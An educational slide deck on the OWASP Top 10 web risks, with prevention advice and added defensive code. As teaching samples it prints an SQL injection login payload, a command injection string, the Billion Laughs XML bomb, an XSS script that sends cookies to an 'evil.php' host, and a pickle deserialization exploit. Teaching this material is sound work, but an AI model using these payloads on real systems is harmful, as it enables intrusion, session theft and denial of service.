OWASP Top 10

Piotr Gawryś

What is OWASP?

Open Web Application Security Project

  • Application security tools and standards
  • Learning resources
  • Standard security controls and libraries
  • Conferences
  • Non-profit, open to use and contribute to

https://www.owasp.org

OWASP Top 10

  • List of common vulnerabilities
  • Application security standard
  • Provides basic techniques to protect against high-risk problem areas
  • Education and raising awareness
  • Should be considered a starting point

https://www.owasp.org/index.php/top10

How is the ranking created?

  • Based on community feedback and data assembled from dozens of organizations (gathered from over 100 000 real-world applications and APIs)
  • Top 10 items are selected and prioritized according to this data, in combination with other factors such as exploitability, detectability, and impact
  • Previous editions: 2010, 2013

Injection

  • Malicious input is sent through the web application to another sub-system as part of a command or query
  • The attacker tricks the interpreter into executing unintended commands or accessing data without proper authorization

SQL Injection

login: user' OR 1=1 #
password: (left empty)

Query template:

SELECT data, login, password FROM users
WHERE login = '$login' AND password = '$password';

Resulting query (everything after # is a comment, so the password check disappears):

SELECT data, login, password FROM users
WHERE login = 'user' OR 1=1 # AND password = '';

OS Injection

public class DoStuff {
  // Imagine that the attacker would pass e.g. "userName ; cat /etc/host"
  public void executeCommand(String userName) {
    try {
      Runtime rt = Runtime.getRuntime();
      // Call the executable with userName concatenated straight into the command line
      rt.exec("doStuff.exe " + "-" + userName);
    } catch (Exception e) {
      e.printStackTrace();
    }
  }
}

Injection Prevention

  • Keep data separated from commands and queries
  • Input validation
  • Escape special characters
  • Use LIMIT in SQL queries to at least limit the damage
  • Don't build SQL query strings by hand
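The slide's login query, as an added example (not from the deck), built first by string concatenation and then with bound parameters. The `users` table is constructed in-memory with sqlite3; note that SQLite comments start with `--`, whereas the slide's `#` is MySQL syntax, so the payload is adjusted accordingly.

```python
import sqlite3


def make_db():
    """Constructed in-memory stand-in for the slide's users table."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (data TEXT, login TEXT, password TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?, ?)",
                   [("alice-secret", "alice", "correct horse"),
                    ("bob-secret", "bob", "hunter2")])
    return db


def login_concat(db, login, password):
    """Vulnerable: user input is pasted into the SQL text (the slide's query)."""
    sql = ("SELECT data, login, password FROM users "
           f"WHERE login = '{login}' AND password = '{password}'")
    return db.execute(sql).fetchall()


def login_param(db, login, password):
    """Hardened: input travels as bound parameters, never as SQL syntax.

    LIMIT 1 follows the slide's advice to cap the damage of a bad query."""
    sql = ("SELECT data, login, password FROM users "
           "WHERE login = ? AND password = ? LIMIT 1")
    return db.execute(sql, (login, password)).fetchall()


# The slide's payload with SQLite's comment marker instead of MySQL's "#".
PAYLOAD = "user' OR 1=1 --"


def demo():
    """Return (rows leaked by concatenation, rows returned by parameters)."""
    db = make_db()
    leaked = login_concat(db, PAYLOAD, "")   # OR 1=1 matches every row
    safe = login_param(db, PAYLOAD, "")      # literal string, matches nothing
    return len(leaked), len(safe)
```

With the concatenated query the payload returns every user's row; the parameterized version looks for a login literally named `user' OR 1=1 --` and returns nothing.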

Broken Authentication

  • Logging into someone else's account
  • Can compromise the entire system with just one successful attempt

Broken Authentication Prevention

  • Multi-factor authentication
  • Don't use any default credentials
  • Weak-password checks
  • Use the same message for all failed login attempts
  • Use server-side sessions that are securely stored and invalidated
  • Rate limiting

Sensitive Data Exposure

  • The attacker gets access to sensitive data using means such as man-in-the-middle attacks, or by stealing data in transit or from the browser

Sensitive Data Exposure Examples

  • An application encrypts credit card numbers in a database using automatic database encryption, which decrypts them automatically when retrieved. An SQL injection flaw then retrieves the credit card numbers in clear text
  • Man-in-the-middle attack: the attacker acts as a proxy between the user and the web application, intercepting the data

Sensitive Data Exposure Prevention

  • Encrypt all sensitive data at rest
  • Encrypt all data in transit with secure protocols
  • Don't store sensitive data unnecessarily
  • Use up-to-date, strong standard algorithms and protocols
  • Store passwords using strong, salted hashing functions
  • Disable caching for responses that contain sensitive data

XML External Entities (XXE)

  • Attack against a web application that parses XML input
  • Exploits vulnerable XML processors by including hostile content in the XML
  • Flaws can be used to extract data, execute a remote request from the server and more

Billion Laughs Attack

<?xml version="1.0"?>
<!DOCTYPE lolz [
 <!ENTITY lol "lol">
 <!ELEMENT lolz (#PCDATA)>
 <!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
 <!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
 <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
 <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
 <!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
 <!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
 <!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
 <!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
 <!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
]>
<lolz>&lol9;</lolz>

Expands to one billion "lol" strings (~3 GB of memory)!

XML External Entities (XXE) Prevention

  • Use less complex data formats such as JSON, whenever possible
  • Avoid serialization of sensitive data
  • Disable the use of external entities in the XML application
  • Use the latest version of XML processors and libraries
  • Validate XML input data
  • Use tools such as SAST, which can help detect the issue
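One way to implement "disable entities" with the standard-library expat bindings, as an added example (not from the deck): the DOCTYPE handler fires before any `<!ENTITY>` declaration is processed, so refusing it there stops both the slide's internal entity bomb and external entity (XXE) declarations. The sample documents are constructed; the bomb is the slide's, shortened to three levels.

```python
import xml.parsers.expat as expat


class ForbiddenDTD(ValueError):
    """Raised when the input carries a DOCTYPE and could declare entities."""


def parse_without_dtd(xml_bytes: bytes) -> str:
    """Parse XML, rejecting any DOCTYPE; returns the root element's name."""
    parser = expat.ParserCreate()
    root = []

    def on_doctype(name, sysid, pubid, has_internal_subset):
        # Called as soon as <!DOCTYPE ...> is seen, before entity expansion.
        raise ForbiddenDTD(f"DOCTYPE '{name}' is not allowed")

    def on_start(name, attrs):
        if not root:
            root.append(name)

    parser.StartDoctypeDeclHandler = on_doctype
    parser.StartElementHandler = on_start
    parser.Parse(xml_bytes, True)  # exceptions from handlers propagate
    return root[0]


# Constructed sample: the slide's entity bomb, cut to three levels (1000 "lol"s).
LOLZ = b"""<?xml version="1.0"?>
<!DOCTYPE lolz [
 <!ENTITY lol "lol">
 <!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
 <!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
]>
<lolz>&lol2;</lolz>"""

# Constructed sample: ordinary application input with no DTD.
BENIGN = b'<?xml version="1.0"?><order id="42"><item>book</item></order>'


def is_accepted(xml_bytes: bytes) -> bool:
    """True if the document parses under the no-DTD policy."""
    try:
        parse_without_dtd(xml_bytes)
        return True
    except ForbiddenDTD:
        return False
```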

Broken Access Control

  • Incorrectly implemented access control
  • Hard to detect automatically
  • The attacker can act as a user or administrator, using privileged functions

Broken Access Control Example

The website distinguishes admin resources only by their URL, e.g.

http://example.com/app/getappinfo

http://example.com/app/admin_getappinfo

Broken Access Control Prevention

  • Deny by default
  • Implement once and re-use throughout the application
  • Access control models should enforce record ownership, rather than accepting that the user can create, read, update, or delete any record
  • Invalidate tokens after logout
  • Write functional access control tests
  • Log access control failures, alert admins when appropriate (e.g. repeated failures)
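Deny-by-default routing, record ownership and failure logging from the list above, applied to the slide's two URLs, as an added example (not from the deck). The route table, roles and record store are constructed for the example.

```python
import logging

log = logging.getLogger("access")

# Constructed route table: every endpoint must be listed with the role it
# needs. A path that is missing here is denied, not quietly allowed.
ROUTE_ROLES = {
    "/app/getappinfo": "user",
    "/app/admin_getappinfo": "admin",
}
ROLE_RANK = {"user": 1, "admin": 2}

# Constructed record store: each record carries its owner.
RECORDS = {101: {"owner": "alice", "body": "alice's note"},
           202: {"owner": "bob", "body": "bob's note"}}


class Forbidden(Exception):
    """Single failure type so callers cannot tell 'missing' from 'not yours'."""


def authorize_route(user: str, role: str, path: str) -> bool:
    """Allow only known routes whose required role the caller meets."""
    needed = ROUTE_ROLES.get(path)  # None for unknown routes -> deny
    if needed is None or ROLE_RANK.get(role, 0) < ROLE_RANK[needed]:
        log.warning("route denied user=%s role=%s path=%s", user, role, path)
        raise Forbidden(path)
    return True


def read_record(user: str, role: str, record_id: int) -> str:
    """Ownership check: a user reads only own records, an admin any record."""
    record = RECORDS.get(record_id)
    if record is None or (role != "admin" and record["owner"] != user):
        log.warning("record denied user=%s role=%s id=%s", user, role, record_id)
        raise Forbidden(record_id)
    return record["body"]


def route_allowed(user, role, path) -> bool:
    try:
        return authorize_route(user, role, path)
    except Forbidden:
        return False


def record_allowed(user, role, record_id) -> bool:
    try:
        read_record(user, role, record_id)
        return True
    except Forbidden:
        return False
```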

Security Misconfiguration

  • Results from using default, incomplete or ad hoc configurations, excessively verbose errors, or enabling unnecessary features (e.g. open ports, accounts)
  • Can happen at any level of the application stack
  • The attacker can get unauthorized access to some parts of the system

Security Misconfiguration Example

  • Directory listing is not disabled on the server, so an attacker can list and download compiled Java classes
  • The server returns detailed error messages, e.g. stack traces

Security Misconfiguration Prevention

  • Design a repeatable hardening process that makes it fast and easy to deploy another environment that is secure. Dev, QA and Prod environments should have the same configuration, with different credentials.
  • Remove or do not install unused features
  • Review and update configurations as part of the security process, e.g. cloud storage permissions
  • Send security directives to clients

Cross-Site Scripting (XSS)

  • Occurs when a web application allows users to add custom code into a URL path or onto a website that will be seen by other users. It can run malicious JavaScript code in a victim's browser
  • Found in around 2/3 of all applications
  • The attacker can steal credentials, sessions, or deliver malware to the victim

Cross-Site Scripting (XSS) Example

<SCRIPT type="text/javascript">
var adr = '../evil.php?cakemonster=' + escape(document.cookie);
</SCRIPT>

Embedding script in URL:

Cross-Site Scripting (XSS) Prevention

  • Use a framework that automatically escapes output by design
  • Escape untrusted HTTP request data
  • Enable Content Security Policy (CSP)

Insecure Deserialization

  • Exploiting deserialization mechanisms
  • Can lead to remote code execution attacks

Insecure Deserialization Example

import os
import pickle

# Attacker prepares an object that the application will insecurely deserialize.
# pickle calls __reduce__ on load, so the returned callable runs during loads().
class Exploit(object):
  def __reduce__(self):
    return (os.system, ('whoami',))

# Attacker serializes the exploit
def serialize_exploit():
  shellcode = pickle.dumps(Exploit())
  return shellcode

# Application insecurely deserializes the attacker's serialized data
def insecure_deserialization(exploit_code):
  pickle.loads(exploit_code)

if __name__ == '__main__':
  # Serialize the exploit
  shellcode = serialize_exploit()

  # Attacker's payload runs a `whoami` command
  insecure_deserialization(shellcode)

Insecure Deserialization Prevention

  • Do not accept serialized objects from untrusted sources, or, if that is impossible:
  • Apply integrity checks, such as digital signatures, to any serialized objects
  • Enforce strict type constraints during deserialization
  • Run deserialization code in low-privilege environments when possible
  • Log deserialization failures
  • Restrict or monitor incoming and outgoing network connectivity from containers/servers that deserialize
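Integrity checking and a strict type constraint from the list above, as an added example (not from the deck): the object is carried as JSON, which cannot name a callable the way the pickle payload does, an HMAC tag over the exact bytes is verified before parsing, and the parsed result must match one expected shape. The key and the session shape are constructed for this example.

```python
import hashlib
import hmac
import json

# Constructed demo key; a deployment would load this from a secret store.
SECRET_KEY = b"demo-key-do-not-use"


def serialize_signed(obj: dict) -> bytes:
    """Data-only JSON plus an HMAC-SHA256 tag: 'hex_tag.json_body'."""
    body = json.dumps(obj, sort_keys=True, separators=(",", ":")).encode()
    tag = hmac.new(SECRET_KEY, body, hashlib.sha256).hexdigest().encode()
    return tag + b"." + body


def deserialize_signed(blob: bytes) -> dict:
    """Verify the tag first, parse second, then enforce the expected shape."""
    tag, sep, body = blob.partition(b".")
    if not sep:
        raise ValueError("malformed message")
    expected = hmac.new(SECRET_KEY, body, hashlib.sha256).hexdigest().encode()
    if not hmac.compare_digest(tag, expected):
        raise ValueError("bad signature")  # nothing below runs on tampered bytes
    obj = json.loads(body)
    # Strict type constraint: a session is exactly {user: str, role: str}.
    if (not isinstance(obj, dict) or set(obj) != {"user", "role"}
            or not all(isinstance(v, str) for v in obj.values())):
        raise TypeError("unexpected object shape")
    return obj


def try_deserialize(blob: bytes):
    """Return the object, or the message of the check that rejected it."""
    try:
        return deserialize_signed(blob)
    except (ValueError, TypeError) as exc:
        return str(exc)
```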

Using Components with Known Vulnerabilities

  • Security holes in popular components can leave huge numbers of sites open to exploitation
  • These components run with the same privileges as the rest of the application
  • Developers often don't even know which components they use or how they work

Using Components with Known Vulnerabilities Prevention

  • Remove unused dependencies
  • Make sure your dependencies are up to date
  • Subscribe to email alerts for security vulnerabilities related to components you use
  • Only obtain dependencies from official sources over secure links, preferably signed

Insufficient Logging & Monitoring

  • Attackers can rely on the lack of monitoring and timely response to achieve their goals without being detected
  • In 2016, identifying a breach took an average of 191 days

Insufficient Logging & Monitoring Examples

  • Not detecting scans that try the same password against many accounts
  • The attackers probed for vulnerabilities but launched the full attack later, and neither was detected

Insufficient Logging & Monitoring Prevention

  • Ensure all login, access control failures, and server-side input validation failures are logged with sufficient user context to identify suspicious or malicious accounts
  • Ensure that logs are generated in a format that can be easily consumed by a centralized log management solution
  • Ensure high-value transactions have an audit trail with integrity controls to prevent tampering or deletion
  • Establish effective monitoring and alerting such that suspicious activities are detected and responded to in a timely fashion
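Detection logic for the first example on the previous slide (one password tried against many accounts), as an added example (not from the deck): per-account lockouts never fire because each account fails once, so the rule groups failures by source and counts distinct accounts in a sliding window. The log format, sample lines and thresholds are constructed for the example.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample auth log: one source cycling through accounts, plus an
# ordinary user who mistypes once and then logs in.
SAMPLE_LOG = """\
2019-03-01T10:00:01 LOGIN_FAIL user=alice src=203.0.113.7
2019-03-01T10:00:02 LOGIN_FAIL user=bob src=203.0.113.7
2019-03-01T10:00:03 LOGIN_FAIL user=carol src=203.0.113.7
2019-03-01T10:00:04 LOGIN_FAIL user=dave src=203.0.113.7
2019-03-01T10:00:05 LOGIN_FAIL user=erin src=203.0.113.7
2019-03-01T10:00:06 LOGIN_FAIL user=frank src=203.0.113.7
2019-03-01T10:05:00 LOGIN_FAIL user=alice src=198.51.100.9
2019-03-01T10:05:30 LOGIN_OK user=alice src=198.51.100.9
"""


def parse_line(line: str):
    """'<iso-time> <event> user=<u> src=<ip>' -> (datetime, event, user, src)."""
    ts, event, user_kv, src_kv = line.split()
    return (datetime.fromisoformat(ts), event,
            user_kv.split("=", 1)[1], src_kv.split("=", 1)[1])


def detect_spraying(log_text: str, window=timedelta(minutes=10), min_accounts=5):
    """Return {source: distinct accounts} for sources that fail against at
    least `min_accounts` different users within `window`."""
    failures = defaultdict(list)
    for line in log_text.splitlines():
        ts, event, user, src = parse_line(line)
        if event == "LOGIN_FAIL":
            failures[src].append((ts, user))
    alerts = {}
    for src, fails in failures.items():
        fails.sort()
        for i, (start, _) in enumerate(fails):
            # distinct accounts failing from this source within the window
            users = {u for t, u in fails[i:] if t - start <= window}
            if len(users) >= min_accounts:
                alerts[src] = len(users)
                break
    return alerts
```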

What about other vulnerabilities?

  • The Top 10 covers a lot of ground, but there are many more important security risks, such as: Cross-Site Request Forgery, Uncontrolled Resource Consumption, Server-Side Request Forgery, ...
  • The OWASP Top 10 document contains additional instructions and links with next steps
